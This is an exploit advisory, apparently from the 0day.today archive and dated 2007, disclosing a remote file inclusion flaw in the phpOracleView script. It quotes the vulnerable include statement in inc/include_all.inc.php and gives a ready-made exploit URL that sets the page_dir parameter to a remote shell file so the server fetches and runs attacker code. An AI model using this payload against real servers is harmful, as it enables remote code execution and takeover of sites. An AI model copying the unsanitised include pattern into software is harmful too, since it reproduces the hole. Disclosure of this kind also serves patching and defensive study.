id: 1799
date: 04/25/2007
title: phpOracleView (include_all.inc.php page_dir) RFI Vulnerability
author: Alkomandoz Hacker
cves: 

==============================================================
phpOracleView (include_all.inc.php page_dir) RFI Vulnerability
==============================================================



===============================
phporacleview =>  (page_dir) Remote File Inclusion Exploit
===============================

Discoverd By : Alkomandoz Hacker


================================

Script Name: phporacleview

Download Script: http://webxadmin.free.fr/download/phporacleview.zip


=================================
Bug in :

phporacleview/inc/include_all.inc.php

=======

<?
include($page_dir . $inc_dir . "config.inc.php");

==================================


Exploit :
--------------------------------

http://localhost/phporacleview/inc/include_all.inc.php?page_dir=http://Shell.txt?

===================================



#  0day.today [2023-03-22]  #